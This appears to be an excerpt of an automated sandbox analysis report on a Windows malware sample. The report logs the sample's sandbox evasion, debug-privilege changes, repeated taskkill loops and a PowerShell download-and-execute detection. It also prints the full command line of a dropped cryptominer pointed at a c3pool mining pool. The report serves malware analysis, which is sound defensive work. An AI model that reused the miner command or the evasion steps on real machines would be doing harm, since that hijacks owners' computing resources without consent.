Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Thread delayed: delay time: 18000000			Jump to behavior

Source: x00zm3KVwb.exe, spread.txt.0.dr

Binary or memory string: \\.\VBoxMiniRdrDN

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: x00zm3KVwb.exe PID: 5708, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\X86.dll, type: DROPPED
Source: Yara match	File source: C:\ProgramData\X64.dll, type: DROPPED

Excessive usage of taskkill to terminate processes

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
